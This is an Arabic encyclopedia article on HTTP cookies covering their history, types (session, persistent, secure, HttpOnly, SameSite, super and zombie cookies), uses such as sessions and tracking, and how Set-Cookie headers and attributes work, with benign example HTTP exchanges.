ملف تعريف ارتباط

ملف تعريف الارتباط أو الكَعْكة^[1] أو الكُعَيْكَة^[2] (بالإنجليزية: Cookies) (يُسمى أيضًا ملف تعريف ارتباط الويب أو ملف تعريف ارتباط الإنترنت أو ملف تعريف ارتباط المتصفح أو ببساطة ملف تعريف الارتباط) كتلةٌ صغيرة من البيانات يتم إنشاؤها بواسطة خادم الويب أثناء تصفح المستخدم لموقع ويب ووضعها على كمبيوتر المستخدم أو جهاز آخر بواسطة متصفح الويب الخاص بالمستخدم. يتم وضع ملفات تعريف الارتباط على الجهاز المستخدم للوصول إلى موقع الويب، وقد يتم وضع أكثر من ملف تعريف ارتباط على جهاز المستخدم أثناء الجلسة.

توفر ملفات تعريف الارتباط وظائف مفيدة وضرورية في بعض الأحيان على الويب. إنها تمكن خوادم الويب من تخزين معلومات الحالة (مثل العناصر المضافة إلى عربة التسوق في متجر عبر الإنترنت) على جهاز المستخدم أو تتبع نشاط تصفح المستخدم (بما في ذلك النقر على أزرار معينة، أو تسجيل الدخول، أو تسجيل الصفحات التي تمت زيارتها في الماضي).^[3] يمكن أيضًا استخدامها لحفظ المعلومات التي أدخلها المستخدم مسبقًا في حقول النموذج، مثل الأسماء والعناوين وكلمات المرور وأرقام بطاقات الدفع  ^{[لغات أخرى]}‏ لاستخدامها لاحقًا.

تُستخدم ملفات تعريف الارتباط للمصادقة بشكل شائع بواسطة خوادم الويب للتحقق من تسجيل دخول المستخدم، والحساب الذي سجل الدخول به. بدون ملف تعريف الارتباط، سيحتاج المستخدمون إلى التحقق من هويتهم عن طريق تسجيل الدخول إلى كل صفحة تحتوي على معلومات حساسة يرغبون في الوصول إليها. يعتمد أمان ملف تعريف الارتباط للمصادقة بشكل عام على أمان موقع الويب المصدر ومتصفح الويب الخاص بالمستخدم، وعلى ما إذا كانت بيانات ملف تعريف الارتباط مشفرة. قد تسمح الثغرات الأمنية للمهاجم بقراءة بيانات ملف تعريف الارتباط، أو استخدامها للوصول إلى بيانات المستخدم، أو استخدامها للوصول (باستخدام بيانات اعتماد المستخدم) إلى موقع الويب الذي ينتمي إليه ملف تعريف الارتباط (انظر نصوص المواقع المتقاطعة وتزوير الطلبات عبر المواقع المتقاطعة للحصول على أمثلة).^[4]

تُستخدم ملفات تعريف الارتباط للتتبع، وخاصة ملفات تعريف الارتباط الخاصة بجهات خارجية، بشكل شائع كطرق لتجميع السجلات طويلة المدى لتاريخ تصفح الأفراد — وهو مصدر قلق محتمل يتعلق بالخصوصية دفع المشرعين الأوروبيين^[5] والأمريكيين إلى اتخاذ إجراء في عام 2011.^[6][7] يتطلب القانون الأوروبي أن تحصل جميع مواقع الويب التي تستهدف الدول الأعضاء في الاتحاد الأوروبي على «موافقة مستنيرة» من المستخدمين قبل تخزين ملفات تعريف الارتباط غير الضرورية على أجهزتهم.

الخلفية

أصل الاسم

 

تتشارك ملفات تعريف الارتباط بروتوكول نقل النص الفائق اسمها مع وجبة خفيفة مخبوزة شهيرة.

صِيغ مصطلح ملف تعريف الارتباط بواسطة مبرمج متصفح الويب لو مونتولي  ^{[لغات أخرى]}‏. اشتق من مصطلح ملف تعريف الارتباط السحري  ^{[لغات أخرى]}‏، وهو حزمة من البيانات يستقبلها البرنامج ويرسلها مرة أخرى دون تغيير، ويستخدمها مبرمجو يونكس.^[8][9]

التاريخ

كانت ملفات تعريف الارتباط السحرية تُستخدم بالفعل في الحوسبة عندما خطرت فكرة استخدام ملفات تعريف الارتباط السحرية في اتصالات الويب في يونيو 1994 لمبرمج الكمبيوتر لو مونتولي.^[10] في ذلك الوقت، كان موظفًا في شركة نتسكيب للاتصالات، التي كانت تعمل على تطوير تطبيق للتجارة الإلكترونية لشركة إم سي آي  ^{[لغات أخرى]}‏. مثل فينت سيرف وجون كلينسين شركة إم سي آي في المناقشات الفنية مع شركة نتسكيب للاتصالات. لم ترغب شركة إم سي آي في أن تضطر خوادمها إلى الاحتفاظ بحالات المعاملات الجزئية، مما دفعها إلى مطالبة نتسكيب بإيجاد طريقة لتخزين تلك الحالة في جهاز الكمبيوتر الخاص بكل مستخدم بدلاً من ذلك. لقد وفرت ملفات تعريف الارتباط حلاً لمشكلة تنفيذ عربة التسوق الافتراضية بشكل موثوق.^[11][12]

بالتعاون مع جون جياناندريا، كتب مونتولي مواصفات ملفات تعريف الارتباط الأولية لنتسكيب في نفس العام. تم إصدار الإصدار 0.9 بيتا من نتسكيب نافيجاتور، في 13 أكتوبر 1994،^[13][14] ملفات تعريف الارتباط المدعومة.^[12] كان أول استخدام لملفات تعريف الارتباط (خارج المختبرات) هو التحقق مما إذا كان زوار موقع نتسكيب قد زاروا الموقع بالفعل. تقدم مونتولي بطلب للحصول على براءة اختراع لتكنولوجيا الكوكيز في عام 1995، والتي تم منحها في عام 1998.^[15] دُمج دعم ملفات تعريف الارتباط بمتصفح إنترنت إكسبلورر في الإصدار 2، الذي تم إصداره في أكتوبر 1995.^[16]

لم يكن تقديم ملفات تعريف الارتباط معروفًا على نطاق واسع للعامة في ذلك الوقت. على وجه الخصوص، تم قبول ملفات تعريف الارتباط بشكل افتراضي، ولم يتم إخطار المستخدمين بوجودها.^[17] علم الجمهور عن ملفات تعريف الارتباط بعد أن نشرت صحيفة فاينانشال تايمز مقالاً عنها في 12 فبراير 1996.^[18] وفي العام نفسه، حظيت ملفات تعريف الارتباط بقدر كبير من الاهتمام الإعلامي، وخاصة بسبب الآثار المحتملة التي قد تترتب على الخصوصية. تمت مناقشة ملفات تعريف الارتباط في جلستي استماع للجنة التجارة الفيدرالية الأمريكية في عامي 1996 و1997.^[4]

وكان تطوير مواصفات ملفات تعريف الارتباط الرسمية جارياً بالفعل. وعلى وجه الخصوص، بدأت المناقشات الأولى حول المواصفات الرسمية في أبريل/نيسان 1995 على قائمة البريد الإلكتروني www-talk. تم تشكيل مجموعة عمل خاصة ضمن فريق عمل هندسة الإنترنت (IETF). وقد اقترح بريان بهليندورف وديفيد كريستول على التوالي اقتراحين بديلين لإدخال الحالة في معاملات بروتوكول نقل النص الفائق. لكن المجموعة، برئاسة كريستول نفسه ولو مونتولي، قررت سريعاً استخدام مواصفات نتسكيب كنقطة بداية. في فبراير 1996، حددت مجموعة العمل ملفات تعريف الارتباط الخاصة بطرف ثالث باعتبارها تهديدًا كبيرًا للخصوصية. وفي نهاية المطاف، تم نشر المواصفات التي أنتجتها المجموعة باسم آر إف سي 2109 في فبراير 1997. ويوضح أن ملفات تعريف الارتباط الخاصة بجهات خارجية غير مسموح بها على الإطلاق، أو على الأقل غير ممكّنة بشكل افتراضي.^[19] في هذا الوقت، كانت شركات الإعلان تستخدم بالفعل ملفات تعريف الارتباط التابعة لجهات خارجية. لم يتبع متصفحا نتسكيب وإنترنت إكسبلورر التوصية المتعلقة بملفات تعريف الارتباط الخاصة بأطراف ثالثة الواردة في آر إف سي 2109. تم استبدال آر إف سي 2109 بآر إف سي 2965 في أكتوبر 2000.

أضافت آر إف سي 2965 حقل رأس Set-Cookie2، والذي أصبح يُطلق عليه بشكل غير رسمي «ملفات تعريف الارتباط على غرار آر إف سي 2965» على عكس حقل رأس Set-Cookie الأصلي الذي كان يُطلق عليه «ملفات تعريف الارتباط على غرار نتسكيب».^[20][21] ومع ذلك، نادرًا ما تم استخدام Set-Cookie2، وتم إيقاف استخدامه في آر إف سي 6265 في أبريل 2011 والذي تمت كتابته كمواصفات نهائية لملفات تعريف الارتباط كما تستخدم في العالم الحقيقي.^[22] لا يتعرف أي متصفح حديث على حقل رأس Set-Cookie2.^[23]

المصطلحات

ملف تعريف ارتباط الجلسة

ملف تعريف الارتباط للجلسة (المعروف أيضًا باسم ملف تعريف الارتباط في الذاكرة أو ملف تعريف الارتباط المؤقت أو ملف تعريف الارتباط غير الدائم) موجود فقط في الذاكرة المؤقتة أثناء تنقل المستخدم عبر موقع الويب.^[24] تنتهي صلاحية ملفات تعريف الارتباط الخاصة بالجلسة أو يتم حذفها عندما يغلق المستخدم متصفح الويب.^[25] يتم التعرف على ملفات تعريف الارتباط الخاصة بالجلسة بواسطة المتصفح من خلال عدم وجود تاريخ انتهاء صلاحية مخصص لها.

ملف تعريف الارتباط المستمر

تنتهي صلاحية ملف تعريف الارتباط المستمر في تاريخ محدد أو بعد فترة زمنية محددة. بالنسبة لعمر ملف تعريف الارتباط المستمر الذي حدده منشئه، سيتم نقل معلوماته إلى الخادم في كل مرة يزور فيها المستخدم موقع الويب الذي ينتمي إليه، أو في كل مرة يشاهد فيها المستخدم موردًا ينتمي إلى هذا الموقع من موقع ويب آخر (مثل الإعلان).

لهذا السبب، تُسمى ملفات تعريف الارتباط الدائمة أحيانًا بملفات تعريف الارتباط للتتبع^[26][27] إذ يُمكن للمُعلنين استخدامها لتسجيل معلومات حول عادات تصفح المستخدم للويب على مدار فترة زمنية طويلة. كما تُستخدم ملفات تعريف الارتباط الدائمة لأسباب مثل إبقاء المستخدمين مُسجلين دخولهم إلى حساباتهم على مواقع الويب، لتجنب إعادة إدخال بيانات اعتماد تسجيل الدخول في كل زيارة.

ملف تعريف الارتباط الآمن

لا يمكن نقل ملف تعريف الارتباط الآمن إلا عبر اتصال مشفر (أي بروتوكول نقل النص الفائق الآمن). لا يمكن نقلها عبر اتصالات غير مشفرة (مثل بروتوكول نقل النص الفائق). يؤدي هذا إلى تقليل احتمالية تعرض ملف تعريف الارتباط للسرقة عن طريق التنصت. يتم تأمين ملف تعريف الارتباط عن طريق إضافة علامة Secure إلى ملف تعريف الارتباط.

ملف تعريف الارتباط الخاص ببروتوكول نقل النص الفائق فقط

لا يمكن الوصول إلى ملف تعريف الارتباط http فقط بواسطة واجهات برمجة التطبيقات الموجودة على جانب العميل، مثل جافا سكريبت. يؤدي هذا القيد إلى إزالة خطر سرقة ملفات تعريف الارتباط عبر نصوص المواقع المتقاطعة (XSS).^[28] ومع ذلك، تظل ملفات تعريف الارتباط عرضة لهجمات التتبع عبر المواقع  ^{[لغات أخرى]}‏ (XST) وتزوير الطلبات عبر المواقع (CSRF). يتم منح ملف تعريف الارتباط هذه الخاصية عن طريق إضافة علامة HttpOnly إلى ملف تعريف الارتباط.

ملف تعريف الارتباط الخاص بالموقع نفسه

في عام 2016، قدمت نسخة جوجل كروم 51^[29] نوعًا جديدًا من ملفات تعريف الارتباط مع السمة SameSite مع قيم محتملة Strict أو Lax أو None.^[30] مع السمة SameSite=Strict، سوف ترسل المتصفحات ملفات تعريف الارتباط فقط إلى نطاق مستهدف يتطابق مع نطاق الأصل. سيؤدي هذا إلى التخفيف بشكل فعال من هجمات تزوير طلبات المواقع المتعددة (CSRF). مع SameSite=Lax، سترسل المتصفحات ملفات تعريف الارتباط مع الطلبات إلى نطاق مستهدف حتى لو كان مختلفًا عن نطاق المصدر، ولكن فقط للطلبات الآمنة مثل GET (POST غير آمن) وليس ملفات تعريف الارتباط الخاصة بجهات خارجية (داخل iframe). تسمح السمة SameSite=None بملفات تعريف الارتباط الخاصة بأطراف ثالثة (عبر المواقع)، ومع ذلك، تتطلب معظم المتصفحات السمة الآمنة على ملفات تعريف الارتباط SameSite=None.^[31]

تم دمج ملف تعريف الارتباط الخاص بالموقع نفسه في مسودة آر إف سي جديدة لـ«ملفات تعريف الارتباط: آلية إدارة حالة بروتوكول نقل النص الفائق»^[32] لتحديث آر إف سي 6265 (إذا تمت الموافقة عليها).

بدأت متصفحات كروم وفيرفكس وإيدج في دعم ملفات تعريف الارتباط الخاصة بالموقع نفسه.^[33] إن مفتاح الطرح هو معالجة ملفات تعريف الارتباط الموجودة دون تحديد سمة سيمسايت، حيث كان كروم يعامل ملفات تعريف الارتباط الموجودة كما لو كان SameSite=None، وهذا من شأنه أن يسمح بتشغيل جميع مواقع الويب/التطبيقات كما كان من قبل. كانت جوجل تنوي تغيير هذا الإعداد الافتراضي إلى SameSite=Lax في كروم 80 المقرر إصداره في فبراير 2020،^[34] ولكن نظرًا لاحتمالية تعطل تلك التطبيقات/مواقع الويب التي تعتمد على ملفات تعريف الارتباط الخاصة بجهات خارجية/عبر المواقع وظروف كوفيد-19، أرجأت جوجل هذا التغيير إلى كروم 84.^[35][36]

سوبر كوكي

ملف تعريف الارتباط الفائق هو ملف تعريف ارتباط له أصل نطاق المستوى الأعلى (مثل.com) أو لاحقة عامة (مثل.co.uk). على النقيض من ذلك، فإن ملفات تعريف الارتباط العادية لها أصل اسم نطاق محدد، مثل example.com.

يمكن أن تشكل ملفات تعريف الارتباط الفائقة مشكلة أمنية محتملة، وبالتالي يتم حظرها غالبًا بواسطة متصفحات الويب. إذا تم إلغاء حظره بواسطة المتصفح، يمكن للمهاجم الذي يتحكم في موقع ويب ضار تعيين ملف تعريف ارتباط فائق وتعطيل أو انتحال طلبات المستخدم المشروعة إلى موقع ويب آخر يشترك في نفس المجال الأعلى مستوى أو اللاحقة العامة مع موقع الويب الضار. على سبيل المثال، قد يؤثر ملف تعريف الارتباط الفائق الذي أصله.com بشكل ضار على طلب تم إرساله إلى example.com، حتى لو لم يكن ملف تعريف الارتباط صادرًا من example.com. يمكن استخدام هذا لتزييف عمليات تسجيل الدخول أو تغيير معلومات المستخدم.

تساعد قائمة اللواحق العامة  ^{[لغات أخرى]}‏^[37] في التخفيف من المخاطر التي تشكلها ملفات تعريف الارتباط الفائقة. قائمة اللواحق العامة هي مبادرة مشتركة بين البائعين تهدف إلى توفير قائمة دقيقة ومحدثة من لواحق أسماء النطاقات. قد لا تحتوي الإصدارات القديمة من المتصفحات على قائمة محدثة، وبالتالي ستكون عرضة لملفات تعريف الارتباط الفائقة من نطاقات معينة.

استخدامات أخرى

يتم استخدام مصطلح سوبر كوكيز في بعض الأحيان لتقنيات التتبع التي لا تعتمد على ملفات تعريف الارتباط بروتوكول نقل النص الفائق. تم العثور على آليتين لملفات تعريف الارتباط الفائقة على مواقع مايكروسوفت على الويب في أغسطس 2011: مزامنة ملفات تعريف الارتباط  ^{[لغات أخرى]}‏ التي أعادت إنتاج ملفات تعريف الارتباط معرف الجهاز الفريد (MUID)، وملفات تعريف الارتباط علامة إلكترونية.^[38] ونتيجة لاهتمام وسائل الإعلام، قامت مايكروسوفت لاحقًا بتعطيل هذا الكود.^[39] في منشور مدونة عام 2021، استخدمت موزيلا مصطلح سوبر كوكيز للإشارة إلى استخدام ذاكرة التخزين المؤقت للمتصفح كوسيلة لتتبع المستخدمين عبر المواقع.^[40]

كوكي الزومبي

المقالة الرئيسة: ملف تعريف ارتباط زومبي

ملف تعريف الارتباط الزومبي هو بيانات ورموز تم وضعها بواسطة خادم الويب على كمبيوتر الزائر أو جهاز آخر في مكان مخفي خارج موقع تخزين ملفات تعريف الارتباط المخصص لمتصفح الويب الخاص بالزائر، والذي يقوم تلقائيًا بإعادة إنشاء ملف تعريف ارتباط بروتوكول نقل النص الفائق كملف تعريف ارتباط عادي بعد حذف ملف تعريف الارتباط الأصلي. يمكن تخزين ملف تعريف الارتباط الزومبي في مواقع متعددة، مثل كائن مشترك محلي  ^{[لغات أخرى]}‏، وتخزين الويب لغة تأشير النص الترابطي 5، ومواقع أخرى على جانب العميل وحتى على جانب الخادم، وعندما يتم اكتشاف الغياب في أحد المواقع، يتم إعادة إنشاء المثيل المفقود بواسطة كود جافا سكريبت باستخدام البيانات المخزنة في مواقع أخرى.^[41][42]

جدار الكوكيز

يظهر جدار ملفات تعريف الارتباط على موقع الويب لإعلام المستخدم باستخدام الموقع لملفات تعريف الارتباط. لا يوجد خيار رفض، ولا يمكن الوصول إلى الموقع بدون ملفات تعريف ارتباط التتبع.

البنية

يتكون ملف تعريف الارتباط من المكونات التالية:^[43][44][45]

1. الاسم
2. القيمة
3. صفر أو أكثر من السمات (أزواج الاسم/القيمة). تخزن السمات معلومات مثل تاريخ انتهاء صلاحية ملف تعريف الارتباط والنطاق والأعلام (مثل Secure و HttpOnly).

الاستخدامات

إدارة الجلسة

تم تقديم ملفات تعريف الارتباط في الأصل لتوفير طريقة للمستخدمين لتسجيل العناصر التي يرغبون في شرائها أثناء تنقلهم عبر موقع ويب (عربة تسوق افتراضية أو سلة تسوق).^[11][12] أما اليوم، فإن محتويات عربة التسوق الخاصة بالمستخدم عادة ما يتم تخزينها في قاعدة بيانات على الخادم، وليس في ملف تعريف الارتباط على العميل. لتتبع كل مستخدم تم تعيينه لعربة التسوق الخاصة به، يرسل الخادم ملف تعريف ارتباط إلى العميل يحتوي على معرف جلسة فريد (عادةً، سلسلة طويلة من الأحرف والأرقام العشوائية). نظرًا لأن ملفات تعريف الارتباط يتم إرسالها إلى الخادم مع كل طلب يقدمه العميل، فسيتم إرسال معرف الجلسة هذا مرة أخرى إلى الخادم في كل مرة يزور فيها المستخدم صفحة جديدة على موقع الويب، مما يتيح للخادم معرفة عربة التسوق التي يجب عرضها للمستخدم.

من الاستخدامات الشائعة الأخرى لملفات تعريف الارتباط تسجيل الدخول إلى مواقع الويب. فعندما يزور المستخدم صفحة تسجيل الدخول، يُرسل خادم الويب عادةً ملف تعريف ارتباط إلى العميل يحتوي على مُعرّف جلسة فريد. وعندما يُسجّل المستخدم دخوله بنجاح، يتذكر الخادم أن مُعرّف الجلسة هذا قد تمت مُصادقته، ويمنحه حق الوصول إلى خدماته.

نظرًا لأن ملفات تعريف ارتباط الجلسة تحتوي فقط على مُعرّف جلسة فريد، فإن هذا يجعل كمية المعلومات الشخصية التي يُمكن لموقع الويب حفظها عن كل مستخدم غير محدودة تقريبًا - فلا يخضع الموقع لقيود تتعلق بحجم ملف تعريف الارتباط. كما تُساعد ملفات تعريف ارتباط الجلسة على تحسين أوقات تحميل الصفحات، نظرًا لصغر حجم المعلومات في ملف تعريف ارتباط الجلسة وقلة استهلاكه للنطاق الترددي.

التخصيص

يمكن استخدام ملفات تعريف الارتباط لحفظ معلومات عن المستخدم لعرض محتوى ذي صلة به مع مرور الوقت. على سبيل المثال، قد يرسل خادم ويب ملف تعريف ارتباط يحتوي على اسم المستخدم الذي استُخدم آخر مرة لتسجيل الدخول إلى موقع ويب، ليتم إدخاله تلقائيًا عند تسجيل دخول المستخدم التالي.

تستخدم العديد من المواقع الإلكترونية ملفات تعريف الارتباط للتخصيص بناءً على تفضيلات المستخدم. يقوم المستخدمون باختيار تفضيلاتهم عن طريق إدخالها في نموذج ويب وإرسال النموذج إلى الخادم. يقوم الخادم بتشفير التفضيلات في ملف تعريف الارتباط ويرسل ملف تعريف الارتباط مرة أخرى إلى المتصفح. بهذه الطريقة، في كل مرة يقوم المستخدم بالوصول إلى صفحة على موقع الويب، يمكن للخادم تخصيص الصفحة وفقًا لتفضيلات المستخدم. على سبيل المثال، كان محرك بحث جوجل يستخدم ملفات تعريف الارتباط للسماح للمستخدمين (حتى غير المسجلين) بتحديد عدد نتائج البحث التي يريدون رؤيتها لكل صفحة. بالإضافة إلى ذلك، يستخدم دك دك غو ملفات تعريف الارتباط للسماح للمستخدمين بتعيين تفضيلات العرض مثل ألوان صفحة الويب.

التتبع

طالع أيضًا: تتبع الويب

يتم استخدام ملفات تعريف الارتباط للتتبع لتتبع عادات تصفح الويب الخاصة بالمستخدمين. يمكن أيضًا القيام بذلك إلى حد ما باستخدام عنوان بروتوكول الإنترنت الخاص بالكمبيوتر الذي يطلب الصفحة أو حقل المرجع في رأس طلب بروتوكول نقل النص الفائق، ولكن ملفات تعريف الارتباط تسمح بدقة أكبر. ويمكن توضيح ذلك على النحو التالي:

1. إذا طلب المستخدم صفحة من الموقع، ولكن الطلب لا يحتوي على أي ملف تعريف ارتباط، يفترض الخادم أن هذه هي الصفحة الأولى التي يزورها المستخدم. وبالتالي، يقوم الخادم بإنشاء معرف فريد (عادةً ما يكون عبارة عن سلسلة من الأحرف والأرقام العشوائية) ويرسله كملف تعريف ارتباط إلى المتصفح مع الصفحة المطلوبة.
2. من هذه النقطة فصاعدًا، سيتم إرسال ملف تعريف الارتباط تلقائيًا بواسطة المتصفح إلى الخادم في كل مرة يتم فيها طلب صفحة جديدة من الموقع. لا يقوم الخادم بإرسال الصفحة كالمعتاد فحسب، بل يقوم أيضًا بتخزين عنوان محدد موقع الموارد الموحد للصفحة المطلوبة، وتاريخ/وقت الطلب، وملف تعريف الارتباط في ملف سجل.

ومن خلال تحليل ملف السجل هذا، يصبح من الممكن معرفة الصفحات التي زارها المستخدم، والتسلسل الذي قام بزيارتها، ومدة زيارتها.

تستغل الشركات عادات المستخدمين على شبكة الإنترنت من خلال تتبع ملفات تعريف الارتباط لجمع معلومات حول عادات الشراء. وجدت صحيفة وول ستريت جورنال أن أفضل خمسين موقعًا إلكترونيًا في أمريكا قامت بتثبيت ما معدله أربعة وستين قطعة من تكنولوجيا التتبع على أجهزة الكمبيوتر، مما أدى إلى إجمالي 3180 ملف تتبع.^[46] ومن الممكن بعد ذلك جمع البيانات وبيعها للشركات المتقدمة للمزايدة.

التنفيذ

 

تفاعل محتمل بين متصفح ويب وخادم ويب يحمل صفحة ويب حيث يرسل الخادم ملف تعريف ارتباط إلى المتصفح ويرسله المتصفح مرة أخرى عند طلب صفحة أخرى

ملفات تعريف الارتباط هي عبارة عن قطع عشوائية من البيانات، يتم اختيارها وإرسالها عادةً أولاً بواسطة خادم الويب، ويتم تخزينها على كمبيوتر العميل بواسطة متصفح الويب. ثم يقوم المتصفح بإرسالها مرة أخرى إلى الخادم مع كل طلب، مما يؤدي إلى إدخال حالات (ذاكرة الأحداث السابقة) في معاملات بروتوكول نقل النص الفائق التي لا تحتوي على حالة. بدون ملفات تعريف الارتباط، فإن كل استرجاع لصفحة ويب أو أحد مكونات صفحة ويب سيكون حدثًا معزولًا، وغير مرتبط إلى حد كبير بجميع مشاهدات الصفحات الأخرى التي يقوم بها المستخدم على موقع الويب. على الرغم من أن ملفات تعريف الارتباط يتم تعيينها عادةً بواسطة خادم الويب، إلا أنه يمكن أيضًا تعيينها بواسطة العميل باستخدام لغة برمجة نصية مثل جافا سكريبت (ما لم يتم تعيين علامة HttpOnly الخاصة بملف تعريف الارتباط، وفي هذه الحالة لا يمكن تعديل ملف تعريف الارتباط بواسطة لغات البرمجة النصية).

تتطلب مواصفات ملفات تعريف الارتباط^[47][48] أن تلبي المتصفحات المتطلبات التالية لدعم ملفات تعريف الارتباط:

• يمكنه دعم ملفات تعريف الارتباط التي يصل حجمها إلى 4096 بايت.
• يمكن أن يدعم ما لا يقل عن 50 ملف تعريف ارتباط لكل نطاق (أي لكل موقع ويب).
• يمكنه دعم ما لا يقل عن 3000 ملف تعريف ارتباط في المجموع.

إعداد ملف تعريف الارتباط

يتم تعيين ملفات تعريف الارتباط باستخدام حقل رأس Set-Cookie، ويتم إرسالها في استجابة بروتوكول نقل النص الفائق من خادم الويب. يعطي حقل الرأس هذا تعليمات لمتصفح الويب بتخزين ملف تعريف الارتباط وإرساله مرة أخرى في الطلبات المستقبلية إلى الخادم (سيتجاهل المتصفح حقل الرأس هذا إذا كان لا يدعم ملفات تعريف الارتباط أو قام بتعطيل ملفات تعريف الارتباط).

على سبيل المثال، يرسل المتصفح طلب بروتوكول نقل النص الفائق الأول إلى الصفحة الرئيسية لموقع الويب www.example.org :

GET /index.html HTTP/1.1
Host: www.example.org
...

يستجيب الخادم بحقلين لرأس Set-Cookie :

HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: theme=light
Set-Cookie: sessionToken=abc123; Expires=Wed, 09 Jun 2021 10:18:14 GMT
...

تحتوي استجابة بروتوكول نقل النص الفائق الخاصة بالخادم على محتويات الصفحة الرئيسية للموقع. لكنها تطلب أيضًا من المتصفح تعيين ملفين تعريف ارتباط. الأول، theme، يعتبر ملف تعريف ارتباط للجلسة لأنه لا يحتوي على سمة Expires أو Max-Age. ملفات تعريف الارتباط الخاصة بالجلسة مخصصة ليتم حذفها بواسطة المتصفح عند إغلاقه. أما الملف الثاني، sessionToken، فيعتبر ملف تعريف ارتباط مستمرًا لأنه يحتوي على سمة Expires، والتي تطلب من المتصفح حذف ملف تعريف الارتباط في تاريخ ووقت محددين.

بعد ذلك، يقوم المتصفح بإرسال طلب آخر لزيارة صفحة spec.html على موقع الويب. يحتوي هذا الطلب على حقل رأس Cookie، والذي يحتوي على ملفي تعريف الارتباط اللذين أرشد الخادم المتصفح لتعيينهما:

GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: theme=light; sessionToken=abc123
…

بهذه الطريقة، يعرف الخادم أن طلب بروتوكول نقل النص الفائق هذا مرتبط بالطلب السابق. سيقوم الخادم بالرد عن طريق إرسال الصفحة المطلوبة، وربما تضمين المزيد من حقول رأس Set-Cookie في استجابة بروتوكول نقل النص الفائق لتوجيه المتصفح لإضافة ملفات تعريف ارتباط جديدة أو تعديل ملفات تعريف الارتباط الموجودة أو إزالة ملفات تعريف الارتباط الموجودة. لإزالة ملف تعريف الارتباط، يجب أن يتضمن الخادم حقل رأس Set-Cookie مع تاريخ انتهاء الصلاحية في الماضي.

قد تتكون قيمة ملف تعريف الارتباط من أي حرف ASCII قابل للطباعة (من ! إلى ~، ومن Unicode إلى \u007E \u0021 باستثناء، وأحرف المسافة البيضاء. يستثني اسم ملف تعريف الارتباط نفس الأحرف، بالإضافة إلى =، حيث أن هذا هو الفاصل بين الاسم والقيمة. يعد معيار ملفات تعريف الارتباط آر إف سي 2965 أكثر تقييدًا ولكن لا يتم تنفيذه بواسطة المتصفحات.

يُستخدم مصطلح فتات الكوكيز أحيانًا للإشارة إلى زوج اسم الكوكيز وقيمته.^[49]

يمكن أيضًا تعيين ملفات تعريف الارتباط بواسطة لغات البرمجة النصية مثل جافا سكريبت التي تعمل داخل المتصفح. في جافا سكريبت، يتم استخدام الكائن document.cookie لهذا الغرض. على سبيل المثال، تقوم التعليمات document.cookie = "temperature=20" بإنشاء ملف تعريف ارتباط باسم درجة الحرارة وقيمة 20.^[50]

سمات ملفات تعريف الارتباط

بالإضافة إلى الاسم والقيمة، يمكن أن تحتوي ملفات تعريف الارتباط على سمة واحدة أو أكثر. لا تُضمّن المتصفحات سمات ملفات تعريف الارتباط في الطلبات المُرسلة إلى الخادم، بل تُرسل اسم ملف تعريف الارتباط وقيمته فقط. تستخدم المتصفحات سمات ملفات تعريف الارتباط لتحديد وقت حذف ملف تعريف الارتباط أو حظره أو إرساله إلى الخادم.

المجال والمسار

تحدد سمات Domain Path نطاق ملف تعريف الارتباط. في الأساس، يخبرون المتصفح بالموقع الذي ينتمي إليه ملف تعريف الارتباط. لأسباب أمنية، لا يمكن تعيين ملفات تعريف الارتباط إلا على النطاق العلوي للمورد الحالي ونطاقاته الفرعية، وليس لنطاق آخر ونطاقاته الفرعية. على سبيل المثال، لا يمكن لموقع الويب example.org تعيين ملف تعريف ارتباط يحتوي على نطاق foo.com لأن هذا من شأنه أن يسمح لموقع الويب example.org بالتحكم في ملفات تعريف الارتباط الخاصة بالنطاق foo.com.

إذا لم يتم تحديد سمات Domain Path لملف تعريف الارتباط بواسطة الخادم، فسيتم تعيينها افتراضيًا على المجال ومسار المورد المطلوب.^[51] ومع ذلك، في معظم المتصفحات هناك فرق بين مجموعة ملفات تعريف الارتباط من foo.com بدون نطاق، ومجموعة ملفات تعريف الارتباط مع نطاق foo.com. في الحالة الأولى، سيتم إرسال ملف تعريف الارتباط فقط للطلبات الموجهة إلى foo.com، والمعروف أيضًا باسم ملف تعريف الارتباط المخصص للمضيف فقط. في الحالة الأخيرة، يتم أيضًا تضمين جميع المجالات الفرعية (على سبيل المثال، docs.foo.com).^[52][53] الاستثناء الملحوظ لهذه القاعدة العامة هو Edge قبل Windows 10 RS3 وإنترنت إكسبلورر قبل IE 11 وWindows 10 RS4 (أبريل 2018)، والذي يرسل دائمًا ملفات تعريف الارتباط إلى المجالات الفرعية بغض النظر عما إذا كان ملف تعريف الارتباط قد تم تعيينه مع أو بدون مجال.^[54]

فيما يلي مثال لبعض حقول رأس Set-Cookie في استجابة بروتوكول نقل النص الفائق لموقع ويب بعد تسجيل دخول المستخدم. تم إرسال طلب بروتوكول نقل النص الفائق إلى صفحة ويب ضمن المجال الفرعي docs.foo.com :

HTTP/1.0 200 OK
Set-Cookie: LSID=DQAAAK…Eaem_vYg; Path=/accounts; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=AYQEVn…DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; HttpOnly
Set-Cookie: SSID=Ap4P…GTEq; Domain=foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
…

ملف تعريف الارتباط الأول، LSID، ليس له سمة Domain، ولديه سمة Path تم تعيينها على /accounts. يخبر هذا المتصفح باستخدام ملف تعريف الارتباط فقط عند طلب الصفحات الموجودة في docs.foo.com/accounts (يتم اشتقاق النطاق من نطاق الطلب). سيتم استخدام ملفي تعريف الارتباط الآخرين، HSID و SSID، عندما يطلب المتصفح أي نطاق فرعي في.foo.com على أي مسار (على سبيل المثال www.foo.com/bar). تعتبر النقطة المسبقة اختيارية في المعايير الحديثة، ولكن يمكن إضافتها لتحقيق التوافق مع التنفيذات المستندة إلى آر إف سي 2109.^[55]

تاريخ الانتهاء والحد الأقصى للعمر

تعرف سمة Expires تاريخًا ووقتًا محددين يجب على المتصفح أن يحذف فيهما ملف تعريف الارتباط. يتم تحديد التاريخ والوقت في النموذج Wdy, DD Mon YYYY HH:MM:SS GMT، أو في النموذج Wdy, DD Mon YY HH:MM:SS GMT لقيم YY حيث YY أكبر من أو يساوي 0 وأقل من أو يساوي 69.^[56]

